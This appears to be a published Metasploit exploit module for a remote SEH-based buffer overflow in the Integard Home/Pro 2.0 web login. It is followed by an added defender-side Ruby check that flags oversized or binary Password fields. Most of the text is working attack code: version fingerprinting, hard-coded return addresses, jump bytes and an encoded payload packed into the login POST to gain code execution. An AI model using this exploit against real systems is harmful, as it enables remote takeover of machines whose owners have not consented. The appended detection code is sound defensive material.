Integard Home and Pro v2 Remote HTTP Buffer Overflow Exploit
Source: http://www.metasploit.com Author: Lincoln Published: 2010-09-08

class Metasploit3 < Msf::Exploit::Remote

 include Msf::Exploit::Remote::Tcp

 def initialize(info = {})
  super(update_info(info,
   'Name'           => 'Integard Home/Pro version 2.0',
   'Description'    => %q{
     Exploit for Integard HTTP Server, vulnerability discovered by Lincoln
   },
   'Author'  =>
    [
     'Lincoln',
     'Nullthreat',
     'rick2600',
    ],
   'License'       => MSF_LICENSE,
   'Version'       => '$Revision: $',
   'References'    =>
    [
     ['URL','http://www.corelan.be:8800/advisories.php?id=CORELAN-10-061'],
    ],
   'DefaultOptions' =>
    {
     'EXITFUNC' => 'thread',
    },
   'Payload'        =>
    {
     'Space'    => 2000,
     'BadChars'  => "\x00\x20\x26\x2f\x3d\x3f\x5c",
     'StackAdjustment' => -3500,
    },
   'Platform'       => 'win',
   'Privileged'     => false,
   'Targets'        =>
    [
     [ 'Automatic Targeting',          { 'auto' => true }],
     [ 'Integard Home 2.0.0.9021', { 'Ret' => 0x0041565E,}],
     [ 'Integard Pro  2.2.0.9026', { 'Ret' => 0x0040362C,}],
    ],
   'DefaultTarget'  => 0))

  register_options(
   [
    Opt::RPORT(18881)
   ], self.class )
 end

 #Current version does not work with bind() type of payloads
 #meterpreter, windows/exec  etc works fine

 def exploit
  mytarget = target
  if(target['auto'])
   mytarget = nil
   print_status("[*] Automatically detecting the target...")
   connect
   get = "GET /banner.jpg HTTP/1.1\r\n\r\n"
   sock.put(get)
   data = sock.recv(1024)
    if (data =~ /Content-Length: 24584/)
     print_status("[!] Found Version - Integard Home")
     mytarget = self.targets[1]
    end
    if (data =~ /Content-Length: 23196/)
     print_status("[!] Found Version - Integard Pro")
     mytarget = self.targets[2]
    end
   sock.close
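  end
  # Abort cleanly when auto-detection matched neither known build
  if mytarget.nil?
   print_error("Unable to detect the target version")
   return
  end
  connect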
  print_status("[!] Selected Target: #{mytarget.name}")
  print_status("[*] Building Buffer")
  pay = payload.encoded
  junk = rand_text_alpha_upper(3091 - pay.length)
  jmp = "\xE9\x2B\xF8\xFF\xFF"
  nseh = "\xEB\xF9\x90\x90"
  seh = [mytarget.ret].pack('V')
  buffer = junk + pay + jmp + nseh + seh
  print_status("[*] Sending Request")
  req = "POST /LoginAdmin HTTP/1.1\r\n"
  req << "Host: 192.168.2.129:18881\r\n"
  req << "Content-Length: 1074\r\n\r\n"
  req << "Password=" + buffer + "&Redirect=%23%23%23REDIRECT%23%23%23&NoJs=0&LoginButtonName=Login"
  sock.put(req)
  print_status("[*] Request Sent")
  sock.close
  handler
 end
end
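
A defender-side check for the request this module builds, as an added example that is not part of the original module: it flags a POST to /LoginAdmin whose Password field is oversized or carries non-printable bytes, or whose declared Content-Length disagrees with the body actually sent. The 256-byte threshold, the host name gateway.example, the sample requests and the helper names are assumptions made for illustration.

```ruby
# Added example (not from the original module). The length threshold and the
# sample requests are constructed assumptions for illustration.
MAX_PASSWORD_LEN = 256 # assumed ceiling for a legitimate admin password

# Returns the reasons a raw HTTP request resembles the module's login POST.
def inspect_login_request(raw)
  raw = raw.dup.force_encoding(Encoding::BINARY)
  head, body = raw.split("\r\n\r\n", 2)
  return [] if head.nil? || body.nil?
  return [] unless head.start_with?("POST /LoginAdmin ")

  findings = []
  # The module hard-codes Content-Length: 1074 while sending a ~3 KB body.
  declared = head[/^Content-Length:\s*(\d+)/i, 1]
  findings << :content_length_mismatch if declared && declared.to_i != body.bytesize

  password = body[/(?:\A|&)Password=([^&]*)/n, 1].to_s
  findings << :oversized_password if password.bytesize > MAX_PASSWORD_LEN
  # Encoded payloads and packed addresses put raw bytes into the form field.
  findings << :binary_in_password if password.match?(/[^\x20-\x7e]/n)
  findings
end

# Builds a constructed request; declared_len defaults to the true body size.
def build_request(password, declared_len = nil)
  body = "Password=".b + password.b +
         "&Redirect=%23%23%23REDIRECT%23%23%23&NoJs=0&LoginButtonName=Login".b
  "POST /LoginAdmin HTTP/1.1\r\nHost: gateway.example:18881\r\n".b +
    "Content-Length: #{declared_len || body.bytesize}\r\n\r\n".b + body
end

# Constructed samples: a normal login and an oversized field with filler bytes.
BENIGN  = build_request("correct horse battery")
SUSPECT = build_request("A" * 3100 + "\xff\xfe".b, 1074)

if __FILE__ == $PROGRAM_NAME
  { "benign" => BENIGN, "suspect" => SUSPECT }.each do |name, req|
    puts "#{name}: #{inspect_login_request(req).inspect}"
  end
end
```

On a live capture the Content-Length comparison only holds once the full body has been reassembled, so apply it to complete requests rather than to single packets.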